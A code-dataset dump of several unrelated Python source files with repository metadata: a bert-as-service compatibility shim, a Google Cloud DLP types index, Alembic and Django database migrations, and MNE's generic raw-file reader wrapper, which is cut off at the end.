f0b61d465c43a5af5d164b54e0cfaea6d2ccdac4 | 139 | py | Python | client/bert_serving/client/_py3_var.py | devanshuDesai/bert-as-service | a1d3a225387bfdea15c7721d8493e6005b1c4a1b | [
"MIT"
] | 10,342 | 2018-11-12T11:11:50.000Z | 2022-03-23T15:29:27.000Z | client/bert_serving/client/_py3_var.py | worksking/bert-as-service | c57a646796c0c967ffd6d97249bce20c384272e3 | [
"MIT"
] | 553 | 2018-11-12T13:41:34.000Z | 2022-03-21T06:52:07.000Z | client/bert_serving/client/_py3_var.py | worksking/bert-as-service | c57a646796c0c967ffd6d97249bce20c384272e3 | [
"MIT"
] | 2,005 | 2018-11-12T12:52:04.000Z | 2022-03-21T10:02:14.000Z | __all__ = ['_py2', '_str', '_buffer', '_raise']
_py2 = False
_str = str
_buffer = memoryview
| 13.9 | 47 | 0.640288 | __all__ = ['_py2', '_str', '_buffer', '_raise']
_py2 = False  # this module is the Python 3 variant (_py3_var) of the compat shims
_str = str  # Py3 str is already unicode-capable
_buffer = memoryview  # zero-copy buffer type on Py3
def _raise(t_e, _e):
    """Raise exception ``t_e`` explicitly chained to cause ``_e`` (Py3 ``raise ... from``)."""
    raise t_e from _e
| 21 | 0 | 23 |
9c1291a2693183eb2286818639ecea6b6ba312dc | 157 | py | Python | covfefe/frameworks/torch/math.py | deepnn/pybrew | 1417c910f6663e1c5f3c5eafdf1a34b68dce88a1 | [
"MIT"
] | 4 | 2017-06-08T08:59:48.000Z | 2020-02-13T18:17:00.000Z | covfefe/frameworks/torch/math.py | deepnn/coffee | 1417c910f6663e1c5f3c5eafdf1a34b68dce88a1 | [
"MIT"
] | null | null | null | covfefe/frameworks/torch/math.py | deepnn/coffee | 1417c910f6663e1c5f3c5eafdf1a34b68dce88a1 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from __future__ import print_function
# This will make all the math functions of torch available
from torch import *
| 26.166667 | 58 | 0.834395 | from __future__ import absolute_import
from __future__ import print_function
# This will make all the math functions of torch available
from torch import *
| 0 | 0 | 0 |
5b5e2f28135770e6b8706e5756cc7952341c4122 | 8,331 | py | Python | google/cloud/dlp_v2/types/__init__.py | LaudateCorpus1/python-dlp | e0a51c9254677016f547647848dcbee85ee1bf29 | [
"Apache-2.0"
] | 32 | 2020-07-11T02:50:13.000Z | 2022-02-10T19:45:59.000Z | google/cloud/dlp_v2/types/__init__.py | LaudateCorpus1/python-dlp | e0a51c9254677016f547647848dcbee85ee1bf29 | [
"Apache-2.0"
] | 112 | 2020-02-11T13:24:14.000Z | 2022-03-31T20:59:08.000Z | google/cloud/dlp_v2/types/__init__.py | LaudateCorpus1/python-dlp | e0a51c9254677016f547647848dcbee85ee1bf29 | [
"Apache-2.0"
] | 22 | 2020-02-03T18:23:38.000Z | 2022-01-29T08:09:29.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .dlp import (
Action,
ActivateJobTriggerRequest,
AnalyzeDataSourceRiskDetails,
BoundingBox,
BucketingConfig,
ByteContentItem,
CancelDlpJobRequest,
CharacterMaskConfig,
CharsToIgnore,
Color,
Container,
ContentItem,
ContentLocation,
CreateDeidentifyTemplateRequest,
CreateDlpJobRequest,
CreateInspectTemplateRequest,
CreateJobTriggerRequest,
CreateStoredInfoTypeRequest,
CryptoDeterministicConfig,
CryptoHashConfig,
CryptoKey,
CryptoReplaceFfxFpeConfig,
DateShiftConfig,
DateTime,
DeidentifyConfig,
DeidentifyContentRequest,
DeidentifyContentResponse,
DeidentifyTemplate,
DeleteDeidentifyTemplateRequest,
DeleteDlpJobRequest,
DeleteInspectTemplateRequest,
DeleteJobTriggerRequest,
DeleteStoredInfoTypeRequest,
DlpJob,
DocumentLocation,
Error,
ExcludeInfoTypes,
ExclusionRule,
FieldTransformation,
Finding,
FinishDlpJobRequest,
FixedSizeBucketingConfig,
GetDeidentifyTemplateRequest,
GetDlpJobRequest,
GetInspectTemplateRequest,
GetJobTriggerRequest,
GetStoredInfoTypeRequest,
HybridContentItem,
HybridFindingDetails,
HybridInspectDlpJobRequest,
HybridInspectJobTriggerRequest,
HybridInspectResponse,
HybridInspectStatistics,
ImageLocation,
InfoTypeDescription,
InfoTypeStats,
InfoTypeTransformations,
InspectConfig,
InspectContentRequest,
InspectContentResponse,
InspectDataSourceDetails,
InspectionRule,
InspectionRuleSet,
InspectJobConfig,
InspectResult,
InspectTemplate,
JobTrigger,
KmsWrappedCryptoKey,
LargeCustomDictionaryConfig,
LargeCustomDictionaryStats,
ListDeidentifyTemplatesRequest,
ListDeidentifyTemplatesResponse,
ListDlpJobsRequest,
ListDlpJobsResponse,
ListInfoTypesRequest,
ListInfoTypesResponse,
ListInspectTemplatesRequest,
ListInspectTemplatesResponse,
ListJobTriggersRequest,
ListJobTriggersResponse,
ListStoredInfoTypesRequest,
ListStoredInfoTypesResponse,
Location,
Manual,
MetadataLocation,
OutputStorageConfig,
PrimitiveTransformation,
PrivacyMetric,
QuasiId,
QuoteInfo,
Range,
RecordCondition,
RecordLocation,
RecordSuppression,
RecordTransformations,
RedactConfig,
RedactImageRequest,
RedactImageResponse,
ReidentifyContentRequest,
ReidentifyContentResponse,
ReplaceDictionaryConfig,
ReplaceValueConfig,
ReplaceWithInfoTypeConfig,
RiskAnalysisJobConfig,
Schedule,
StatisticalTable,
StorageMetadataLabel,
StoredInfoType,
StoredInfoTypeConfig,
StoredInfoTypeStats,
StoredInfoTypeVersion,
Table,
TableLocation,
TimePartConfig,
TransformationErrorHandling,
TransformationOverview,
TransformationSummary,
TransientCryptoKey,
UnwrappedCryptoKey,
UpdateDeidentifyTemplateRequest,
UpdateInspectTemplateRequest,
UpdateJobTriggerRequest,
UpdateStoredInfoTypeRequest,
Value,
ValueFrequency,
ContentOption,
DlpJobType,
InfoTypeSupportedBy,
MatchingType,
MetadataType,
RelationalOperator,
StoredInfoTypeState,
)
from .storage import (
BigQueryField,
BigQueryKey,
BigQueryOptions,
BigQueryTable,
CloudStorageFileSet,
CloudStorageOptions,
CloudStoragePath,
CloudStorageRegexFileSet,
CustomInfoType,
DatastoreKey,
DatastoreOptions,
EntityId,
FieldId,
HybridOptions,
InfoType,
Key,
KindExpression,
PartitionId,
RecordKey,
StorageConfig,
StoredType,
TableOptions,
FileType,
Likelihood,
)
__all__ = (
"Action",
"ActivateJobTriggerRequest",
"AnalyzeDataSourceRiskDetails",
"BoundingBox",
"BucketingConfig",
"ByteContentItem",
"CancelDlpJobRequest",
"CharacterMaskConfig",
"CharsToIgnore",
"Color",
"Container",
"ContentItem",
"ContentLocation",
"CreateDeidentifyTemplateRequest",
"CreateDlpJobRequest",
"CreateInspectTemplateRequest",
"CreateJobTriggerRequest",
"CreateStoredInfoTypeRequest",
"CryptoDeterministicConfig",
"CryptoHashConfig",
"CryptoKey",
"CryptoReplaceFfxFpeConfig",
"DateShiftConfig",
"DateTime",
"DeidentifyConfig",
"DeidentifyContentRequest",
"DeidentifyContentResponse",
"DeidentifyTemplate",
"DeleteDeidentifyTemplateRequest",
"DeleteDlpJobRequest",
"DeleteInspectTemplateRequest",
"DeleteJobTriggerRequest",
"DeleteStoredInfoTypeRequest",
"DlpJob",
"DocumentLocation",
"Error",
"ExcludeInfoTypes",
"ExclusionRule",
"FieldTransformation",
"Finding",
"FinishDlpJobRequest",
"FixedSizeBucketingConfig",
"GetDeidentifyTemplateRequest",
"GetDlpJobRequest",
"GetInspectTemplateRequest",
"GetJobTriggerRequest",
"GetStoredInfoTypeRequest",
"HybridContentItem",
"HybridFindingDetails",
"HybridInspectDlpJobRequest",
"HybridInspectJobTriggerRequest",
"HybridInspectResponse",
"HybridInspectStatistics",
"ImageLocation",
"InfoTypeDescription",
"InfoTypeStats",
"InfoTypeTransformations",
"InspectConfig",
"InspectContentRequest",
"InspectContentResponse",
"InspectDataSourceDetails",
"InspectionRule",
"InspectionRuleSet",
"InspectJobConfig",
"InspectResult",
"InspectTemplate",
"JobTrigger",
"KmsWrappedCryptoKey",
"LargeCustomDictionaryConfig",
"LargeCustomDictionaryStats",
"ListDeidentifyTemplatesRequest",
"ListDeidentifyTemplatesResponse",
"ListDlpJobsRequest",
"ListDlpJobsResponse",
"ListInfoTypesRequest",
"ListInfoTypesResponse",
"ListInspectTemplatesRequest",
"ListInspectTemplatesResponse",
"ListJobTriggersRequest",
"ListJobTriggersResponse",
"ListStoredInfoTypesRequest",
"ListStoredInfoTypesResponse",
"Location",
"Manual",
"MetadataLocation",
"OutputStorageConfig",
"PrimitiveTransformation",
"PrivacyMetric",
"QuasiId",
"QuoteInfo",
"Range",
"RecordCondition",
"RecordLocation",
"RecordSuppression",
"RecordTransformations",
"RedactConfig",
"RedactImageRequest",
"RedactImageResponse",
"ReidentifyContentRequest",
"ReidentifyContentResponse",
"ReplaceDictionaryConfig",
"ReplaceValueConfig",
"ReplaceWithInfoTypeConfig",
"RiskAnalysisJobConfig",
"Schedule",
"StatisticalTable",
"StorageMetadataLabel",
"StoredInfoType",
"StoredInfoTypeConfig",
"StoredInfoTypeStats",
"StoredInfoTypeVersion",
"Table",
"TableLocation",
"TimePartConfig",
"TransformationErrorHandling",
"TransformationOverview",
"TransformationSummary",
"TransientCryptoKey",
"UnwrappedCryptoKey",
"UpdateDeidentifyTemplateRequest",
"UpdateInspectTemplateRequest",
"UpdateJobTriggerRequest",
"UpdateStoredInfoTypeRequest",
"Value",
"ValueFrequency",
"ContentOption",
"DlpJobType",
"InfoTypeSupportedBy",
"MatchingType",
"MetadataType",
"RelationalOperator",
"StoredInfoTypeState",
"BigQueryField",
"BigQueryKey",
"BigQueryOptions",
"BigQueryTable",
"CloudStorageFileSet",
"CloudStorageOptions",
"CloudStoragePath",
"CloudStorageRegexFileSet",
"CustomInfoType",
"DatastoreKey",
"DatastoreOptions",
"EntityId",
"FieldId",
"HybridOptions",
"InfoType",
"Key",
"KindExpression",
"PartitionId",
"RecordKey",
"StorageConfig",
"StoredType",
"TableOptions",
"FileType",
"Likelihood",
)
| 24.868657 | 74 | 0.716721 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .dlp import (
Action,
ActivateJobTriggerRequest,
AnalyzeDataSourceRiskDetails,
BoundingBox,
BucketingConfig,
ByteContentItem,
CancelDlpJobRequest,
CharacterMaskConfig,
CharsToIgnore,
Color,
Container,
ContentItem,
ContentLocation,
CreateDeidentifyTemplateRequest,
CreateDlpJobRequest,
CreateInspectTemplateRequest,
CreateJobTriggerRequest,
CreateStoredInfoTypeRequest,
CryptoDeterministicConfig,
CryptoHashConfig,
CryptoKey,
CryptoReplaceFfxFpeConfig,
DateShiftConfig,
DateTime,
DeidentifyConfig,
DeidentifyContentRequest,
DeidentifyContentResponse,
DeidentifyTemplate,
DeleteDeidentifyTemplateRequest,
DeleteDlpJobRequest,
DeleteInspectTemplateRequest,
DeleteJobTriggerRequest,
DeleteStoredInfoTypeRequest,
DlpJob,
DocumentLocation,
Error,
ExcludeInfoTypes,
ExclusionRule,
FieldTransformation,
Finding,
FinishDlpJobRequest,
FixedSizeBucketingConfig,
GetDeidentifyTemplateRequest,
GetDlpJobRequest,
GetInspectTemplateRequest,
GetJobTriggerRequest,
GetStoredInfoTypeRequest,
HybridContentItem,
HybridFindingDetails,
HybridInspectDlpJobRequest,
HybridInspectJobTriggerRequest,
HybridInspectResponse,
HybridInspectStatistics,
ImageLocation,
InfoTypeDescription,
InfoTypeStats,
InfoTypeTransformations,
InspectConfig,
InspectContentRequest,
InspectContentResponse,
InspectDataSourceDetails,
InspectionRule,
InspectionRuleSet,
InspectJobConfig,
InspectResult,
InspectTemplate,
JobTrigger,
KmsWrappedCryptoKey,
LargeCustomDictionaryConfig,
LargeCustomDictionaryStats,
ListDeidentifyTemplatesRequest,
ListDeidentifyTemplatesResponse,
ListDlpJobsRequest,
ListDlpJobsResponse,
ListInfoTypesRequest,
ListInfoTypesResponse,
ListInspectTemplatesRequest,
ListInspectTemplatesResponse,
ListJobTriggersRequest,
ListJobTriggersResponse,
ListStoredInfoTypesRequest,
ListStoredInfoTypesResponse,
Location,
Manual,
MetadataLocation,
OutputStorageConfig,
PrimitiveTransformation,
PrivacyMetric,
QuasiId,
QuoteInfo,
Range,
RecordCondition,
RecordLocation,
RecordSuppression,
RecordTransformations,
RedactConfig,
RedactImageRequest,
RedactImageResponse,
ReidentifyContentRequest,
ReidentifyContentResponse,
ReplaceDictionaryConfig,
ReplaceValueConfig,
ReplaceWithInfoTypeConfig,
RiskAnalysisJobConfig,
Schedule,
StatisticalTable,
StorageMetadataLabel,
StoredInfoType,
StoredInfoTypeConfig,
StoredInfoTypeStats,
StoredInfoTypeVersion,
Table,
TableLocation,
TimePartConfig,
TransformationErrorHandling,
TransformationOverview,
TransformationSummary,
TransientCryptoKey,
UnwrappedCryptoKey,
UpdateDeidentifyTemplateRequest,
UpdateInspectTemplateRequest,
UpdateJobTriggerRequest,
UpdateStoredInfoTypeRequest,
Value,
ValueFrequency,
ContentOption,
DlpJobType,
InfoTypeSupportedBy,
MatchingType,
MetadataType,
RelationalOperator,
StoredInfoTypeState,
)
from .storage import (
BigQueryField,
BigQueryKey,
BigQueryOptions,
BigQueryTable,
CloudStorageFileSet,
CloudStorageOptions,
CloudStoragePath,
CloudStorageRegexFileSet,
CustomInfoType,
DatastoreKey,
DatastoreOptions,
EntityId,
FieldId,
HybridOptions,
InfoType,
Key,
KindExpression,
PartitionId,
RecordKey,
StorageConfig,
StoredType,
TableOptions,
FileType,
Likelihood,
)
__all__ = (
"Action",
"ActivateJobTriggerRequest",
"AnalyzeDataSourceRiskDetails",
"BoundingBox",
"BucketingConfig",
"ByteContentItem",
"CancelDlpJobRequest",
"CharacterMaskConfig",
"CharsToIgnore",
"Color",
"Container",
"ContentItem",
"ContentLocation",
"CreateDeidentifyTemplateRequest",
"CreateDlpJobRequest",
"CreateInspectTemplateRequest",
"CreateJobTriggerRequest",
"CreateStoredInfoTypeRequest",
"CryptoDeterministicConfig",
"CryptoHashConfig",
"CryptoKey",
"CryptoReplaceFfxFpeConfig",
"DateShiftConfig",
"DateTime",
"DeidentifyConfig",
"DeidentifyContentRequest",
"DeidentifyContentResponse",
"DeidentifyTemplate",
"DeleteDeidentifyTemplateRequest",
"DeleteDlpJobRequest",
"DeleteInspectTemplateRequest",
"DeleteJobTriggerRequest",
"DeleteStoredInfoTypeRequest",
"DlpJob",
"DocumentLocation",
"Error",
"ExcludeInfoTypes",
"ExclusionRule",
"FieldTransformation",
"Finding",
"FinishDlpJobRequest",
"FixedSizeBucketingConfig",
"GetDeidentifyTemplateRequest",
"GetDlpJobRequest",
"GetInspectTemplateRequest",
"GetJobTriggerRequest",
"GetStoredInfoTypeRequest",
"HybridContentItem",
"HybridFindingDetails",
"HybridInspectDlpJobRequest",
"HybridInspectJobTriggerRequest",
"HybridInspectResponse",
"HybridInspectStatistics",
"ImageLocation",
"InfoTypeDescription",
"InfoTypeStats",
"InfoTypeTransformations",
"InspectConfig",
"InspectContentRequest",
"InspectContentResponse",
"InspectDataSourceDetails",
"InspectionRule",
"InspectionRuleSet",
"InspectJobConfig",
"InspectResult",
"InspectTemplate",
"JobTrigger",
"KmsWrappedCryptoKey",
"LargeCustomDictionaryConfig",
"LargeCustomDictionaryStats",
"ListDeidentifyTemplatesRequest",
"ListDeidentifyTemplatesResponse",
"ListDlpJobsRequest",
"ListDlpJobsResponse",
"ListInfoTypesRequest",
"ListInfoTypesResponse",
"ListInspectTemplatesRequest",
"ListInspectTemplatesResponse",
"ListJobTriggersRequest",
"ListJobTriggersResponse",
"ListStoredInfoTypesRequest",
"ListStoredInfoTypesResponse",
"Location",
"Manual",
"MetadataLocation",
"OutputStorageConfig",
"PrimitiveTransformation",
"PrivacyMetric",
"QuasiId",
"QuoteInfo",
"Range",
"RecordCondition",
"RecordLocation",
"RecordSuppression",
"RecordTransformations",
"RedactConfig",
"RedactImageRequest",
"RedactImageResponse",
"ReidentifyContentRequest",
"ReidentifyContentResponse",
"ReplaceDictionaryConfig",
"ReplaceValueConfig",
"ReplaceWithInfoTypeConfig",
"RiskAnalysisJobConfig",
"Schedule",
"StatisticalTable",
"StorageMetadataLabel",
"StoredInfoType",
"StoredInfoTypeConfig",
"StoredInfoTypeStats",
"StoredInfoTypeVersion",
"Table",
"TableLocation",
"TimePartConfig",
"TransformationErrorHandling",
"TransformationOverview",
"TransformationSummary",
"TransientCryptoKey",
"UnwrappedCryptoKey",
"UpdateDeidentifyTemplateRequest",
"UpdateInspectTemplateRequest",
"UpdateJobTriggerRequest",
"UpdateStoredInfoTypeRequest",
"Value",
"ValueFrequency",
"ContentOption",
"DlpJobType",
"InfoTypeSupportedBy",
"MatchingType",
"MetadataType",
"RelationalOperator",
"StoredInfoTypeState",
"BigQueryField",
"BigQueryKey",
"BigQueryOptions",
"BigQueryTable",
"CloudStorageFileSet",
"CloudStorageOptions",
"CloudStoragePath",
"CloudStorageRegexFileSet",
"CustomInfoType",
"DatastoreKey",
"DatastoreOptions",
"EntityId",
"FieldId",
"HybridOptions",
"InfoType",
"Key",
"KindExpression",
"PartitionId",
"RecordKey",
"StorageConfig",
"StoredType",
"TableOptions",
"FileType",
"Likelihood",
)
| 0 | 0 | 0 |
7b4a4abfc360c91e636d21c2caa530fd56ec84b4 | 22 | py | Python | example/__init__.py | ORIGINALLIFE/ndkale | 759a7132afdfcabd2de658a7701673a928992827 | [
"BSD-2-Clause"
] | 210 | 2015-03-28T01:00:08.000Z | 2022-03-20T15:59:57.000Z | example/__init__.py | ORIGINALLIFE/ndkale | 759a7132afdfcabd2de658a7701673a928992827 | [
"BSD-2-Clause"
] | 32 | 2015-07-30T22:31:59.000Z | 2020-05-15T22:22:07.000Z | example/__init__.py | ORIGINALLIFE/ndkale | 759a7132afdfcabd2de658a7701673a928992827 | [
"BSD-2-Clause"
] | 51 | 2015-03-26T21:37:46.000Z | 2022-01-18T05:36:28.000Z | __author__ = 'wenbin'
| 11 | 21 | 0.727273 | __author__ = 'wenbin'
| 0 | 0 | 0 |
3e1124e492698672a5a250af850c0ab097fc9e18 | 2,835 | py | Python | migrations/versions/e96fe0cc3a92_.py | 1ibrary/1ibrary-gzhu | 768af1837d6caa185c101cc82ea67efc931865c1 | [
"Apache-2.0"
] | 4 | 2017-06-30T01:32:52.000Z | 2019-07-03T15:46:24.000Z | migrations/versions/e96fe0cc3a92_.py | 1ibrary/1ibrary-gzhu | 768af1837d6caa185c101cc82ea67efc931865c1 | [
"Apache-2.0"
] | 3 | 2021-03-22T17:13:51.000Z | 2021-12-13T19:40:20.000Z | migrations/versions/e96fe0cc3a92_.py | 1ibrary/1ibrary-gzhu | 768af1837d6caa185c101cc82ea67efc931865c1 | [
"Apache-2.0"
] | null | null | null | """empty message
Revision ID: e96fe0cc3a92
Revises: f1ffa6279209
Create Date: 2017-07-19 09:03:31.402092
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'e96fe0cc3a92'
down_revision = 'f1ffa6279209'
branch_labels = None
depends_on = None
| 38.310811 | 91 | 0.672663 | """empty message
Revision ID: e96fe0cc3a92
Revises: f1ffa6279209
Create Date: 2017-07-19 09:03:31.402092
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'e96fe0cc3a92'
down_revision = 'f1ffa6279209'
branch_labels = None
depends_on = None
def upgrade():
    """Apply revision e96fe0cc3a92: create the book-related tables.

    Creates ``books`` (catalog entries keyed by ``book_id``, with a unique
    external ``book_db_id``), ``book_lists`` (user-owned lists),
    ``subscribes`` (user<->book many-to-many with a timestamp) and
    ``booklist_r`` (book_list<->book association), plus lookup indexes on
    ``books.book_key`` and ``book_lists.user_id``.  Parent tables are
    created before the association tables that reference them.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('books',
    sa.Column('book_id', sa.Integer(), nullable=False),
    sa.Column('book_author', sa.Text(), nullable=True),
    sa.Column('book_cover', sa.Text(), nullable=True),
    sa.Column('book_rate', sa.Integer(), nullable=True),
    sa.Column('book_content', sa.Text(), nullable=True),
    sa.Column('book_publish', sa.Text(), nullable=True),
    sa.Column('book_last_number', sa.Integer(), nullable=True),
    sa.Column('book_key', sa.String(length=13), nullable=True),
    sa.Column('book_db_id', sa.Integer(), nullable=True),
    sa.Column('book_title', sa.Text(), nullable=True),
    sa.Column('book_place', sa.Text(), nullable=True),
    sa.Column('detail_data', sa.Text(), nullable=True),
    sa.Column('hot_id', sa.Integer(), nullable=True),
    sa.PrimaryKeyConstraint('book_id'),
    sa.UniqueConstraint('book_db_id')
    )
    op.create_index(op.f('ix_books_book_key'), 'books', ['book_key'], unique=False)
    op.create_table('book_lists',
    sa.Column('id_', sa.Integer(), nullable=False),
    sa.Column('description', sa.Text(), nullable=True),
    sa.Column('title', sa.Text(), nullable=True),
    sa.Column('user_id', sa.Integer(), nullable=True),
    sa.ForeignKeyConstraint(['user_id'], ['users.id_'], ),
    sa.PrimaryKeyConstraint('id_')
    )
    op.create_index(op.f('ix_book_lists_user_id'), 'book_lists', ['user_id'], unique=False)
    op.create_table('subscribes',
    sa.Column('user_id', sa.Integer(), nullable=False),
    sa.Column('book_id', sa.Integer(), nullable=False),
    sa.Column('timestamp', sa.DateTime(), nullable=True),
    sa.ForeignKeyConstraint(['book_id'], ['books.book_id'], ),
    sa.ForeignKeyConstraint(['user_id'], ['users.id_'], ),
    sa.PrimaryKeyConstraint('user_id', 'book_id')
    )
    op.create_table('booklist_r',
    sa.Column('list_id', sa.Integer(), nullable=True),
    sa.Column('book_id', sa.Integer(), nullable=True),
    sa.ForeignKeyConstraint(['book_id'], ['books.book_id'], ),
    sa.ForeignKeyConstraint(['list_id'], ['book_lists.id_'], )
    )
    # ### end Alembic commands ###
def downgrade():
    """Revert revision e96fe0cc3a92: drop everything created by upgrade().

    Association tables (``booklist_r``, ``subscribes``) are dropped first,
    then each index before its owning table, so no foreign key or index
    ever references a missing table.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_table('booklist_r')
    op.drop_table('subscribes')
    op.drop_index(op.f('ix_book_lists_user_id'), table_name='book_lists')
    op.drop_table('book_lists')
    op.drop_index(op.f('ix_books_book_key'), table_name='books')
    op.drop_table('books')
    # ### end Alembic commands ###
| 2,490 | 0 | 46 |
86d571401a990e4296d11560e57a796c4b8e779e | 1,155 | py | Python | fm/migrations/0013_event_lifecycle.py | prorevizor/noc | 37e44b8afc64318b10699c06a1138eee9e7d6a4e | [
"BSD-3-Clause"
] | 84 | 2017-10-22T11:01:39.000Z | 2022-02-27T03:43:48.000Z | fm/migrations/0013_event_lifecycle.py | prorevizor/noc | 37e44b8afc64318b10699c06a1138eee9e7d6a4e | [
"BSD-3-Clause"
] | 22 | 2017-12-11T07:21:56.000Z | 2021-09-23T02:53:50.000Z | fm/migrations/0013_event_lifecycle.py | prorevizor/noc | 37e44b8afc64318b10699c06a1138eee9e7d6a4e | [
"BSD-3-Clause"
] | 23 | 2017-12-06T06:59:52.000Z | 2022-02-24T00:02:25.000Z | # ----------------------------------------------------------------------
# event lifecycle
# ----------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Third-party modules
from django.db import models
# NOC modules
from noc.core.migration.base import BaseMigration
| 33.970588 | 97 | 0.502165 | # ----------------------------------------------------------------------
# event lifecycle
# ----------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Third-party modules
from django.db import models
# NOC modules
from noc.core.migration.base import BaseMigration
class Migration(BaseMigration):
    """Add event-lifecycle fields to the ``fm_event`` table."""

    def migrate(self):
        """Append lifecycle columns (status, timestamps, root cause link)."""
        # Mock model so the self-referential FK can target fm_event itself.
        event_model = self.db.mock_model(model_name="Event", db_table="fm_event")
        new_columns = [
            # Single-letter lifecycle state; "U" = default initial state.
            ("status", models.CharField("Status", max_length=1, default="U")),
            ("active_till", models.DateTimeField("Active Till", blank=True, null=True)),
            ("close_timestamp", models.DateTimeField("Close Timestamp", blank=True, null=True)),
            # Optional link to the root-cause event (nullable self-reference).
            ("root", models.ForeignKey(event_model, blank=True, null=True, on_delete=models.CASCADE)),
        ]
        for column_name, field in new_columns:
            self.db.add_column("fm_event", column_name, field)
d4ef31c2b7a244a3e4dd3ed00d3eae530c14c6e6 | 3,203 | py | Python | mne/io/_read_raw.py | tczhangzhi/mne-python | 9fc8623eebd62d31039e90927744e376f5ee611c | [
"BSD-3-Clause"
] | null | null | null | mne/io/_read_raw.py | tczhangzhi/mne-python | 9fc8623eebd62d31039e90927744e376f5ee611c | [
"BSD-3-Clause"
] | null | null | null | mne/io/_read_raw.py | tczhangzhi/mne-python | 9fc8623eebd62d31039e90927744e376f5ee611c | [
"BSD-3-Clause"
] | null | null | null | """Generic wrapper function read_raw for specific read_raw_xxx readers."""
# Authors: Clemens Brunner <clemens.brunner@gmail.com>
#
# License: BSD (3-clause)
from pathlib import Path
from functools import partial
from . import (read_raw_edf, read_raw_bdf, read_raw_gdf, read_raw_brainvision,
read_raw_fif, read_raw_eeglab, read_raw_cnt, read_raw_egi,
read_raw_eximia, read_raw_nirx, read_raw_fieldtrip,
read_raw_artemis123, read_raw_nicolet, read_raw_kit,
read_raw_ctf, read_raw_boxy)
from ..utils import fill_doc
# supported read file formats
supported = {".edf": read_raw_edf,
".bdf": read_raw_bdf,
".gdf": read_raw_gdf,
".vhdr": read_raw_brainvision,
".fif": read_raw_fif,
".fif.gz": read_raw_fif,
".set": read_raw_eeglab,
".cnt": read_raw_cnt,
".mff": read_raw_egi,
".nxe": read_raw_eximia,
".hdr": read_raw_nirx,
".mat": read_raw_fieldtrip,
".bin": read_raw_artemis123,
".data": read_raw_nicolet,
".sqd": read_raw_kit,
".ds": read_raw_ctf,
".txt": read_raw_boxy}
# known but unsupported file formats
suggested = {".vmrk": partial(_read_unsupported, suggest=".vhdr"),
".eeg": partial(_read_unsupported, suggest=".vhdr")}
# all known file formats
readers = {**supported, **suggested}
@fill_doc
def read_raw(fname, *, preload=False, verbose=None, **kwargs):
    """Read raw file.
    This function is a convenient wrapper for readers defined in `mne.io`. The
    correct reader is automatically selected based on the detected file format.
    All function arguments are passed to the respective reader.
    The following readers are currently supported:
    `~mne.io.read_raw_artemis123`, `~mne.io.read_raw_bdf`,
    `~mne.io.read_raw_boxy`, `~mne.io.read_raw_brainvision`,
    `~mne.io.read_raw_cnt`, `~mne.io.read_raw_ctf`, `~mne.io.read_raw_edf`,
    `~mne.io.read_raw_eeglab`, `~mne.io.read_raw_egi`,
    `~mne.io.read_raw_eximia`, `~mne.io.read_raw_fieldtrip`,
    `~mne.io.read_raw_fif`, `~mne.io.read_raw_gdf`, `~mne.io.read_raw_kit`,
    `~mne.io.read_raw_nicolet`, and `~mne.io.read_raw_nirx`.
    Parameters
    ----------
    fname : path-like
        Name of the file to read.
    %(preload)s
    %(verbose)s
    **kwargs
        Additional keyword arguments to pass to the underlying reader. For
        details, see the arguments of the reader for the respective file
        format.
    Returns
    -------
    raw : mne.io.Raw
        Raw object.
    """
    # Join *all* suffixes so multi-part extensions such as ".fif.gz" are
    # matched as a single key in the readers mapping.
    ext = "".join(Path(fname).suffixes)
    if ext in readers:
        return readers[ext](fname, preload=preload, verbose=verbose, **kwargs)
    else:
        # Unknown extension: raise an informative ValueError.
        _read_unsupported(fname)
| 33.715789 | 79 | 0.638776 | """Generic wrapper function read_raw for specific read_raw_xxx readers."""
# Authors: Clemens Brunner <clemens.brunner@gmail.com>
#
# License: BSD (3-clause)
from pathlib import Path
from functools import partial
from . import (read_raw_edf, read_raw_bdf, read_raw_gdf, read_raw_brainvision,
read_raw_fif, read_raw_eeglab, read_raw_cnt, read_raw_egi,
read_raw_eximia, read_raw_nirx, read_raw_fieldtrip,
read_raw_artemis123, read_raw_nicolet, read_raw_kit,
read_raw_ctf, read_raw_boxy)
from ..utils import fill_doc
def _read_unsupported(fname, **kwargs):
ext = "".join(Path(fname).suffixes)
msg = f"Unsupported file type ({ext})."
suggest = kwargs.get("suggest")
if suggest is not None:
msg += f" Try reading a {suggest} file instead."
msg += " Consider using a dedicated reader function for more options."
raise ValueError(msg)
# Mapping of file extension -> reader function for formats read directly.
# Note ".fif.gz" is a two-part suffix; read_raw joins *all* of a path's
# suffixes before looking the extension up here.
supported = {".edf": read_raw_edf,
             ".bdf": read_raw_bdf,
             ".gdf": read_raw_gdf,
             ".vhdr": read_raw_brainvision,
             ".fif": read_raw_fif,
             ".fif.gz": read_raw_fif,
             ".set": read_raw_eeglab,
             ".cnt": read_raw_cnt,
             ".mff": read_raw_egi,
             ".nxe": read_raw_eximia,
             ".hdr": read_raw_nirx,
             ".mat": read_raw_fieldtrip,
             ".bin": read_raw_artemis123,
             ".data": read_raw_nicolet,
             ".sqd": read_raw_kit,
             ".ds": read_raw_ctf,
             ".txt": read_raw_boxy}
# Known but unsupported side-car formats: each entry raises ValueError
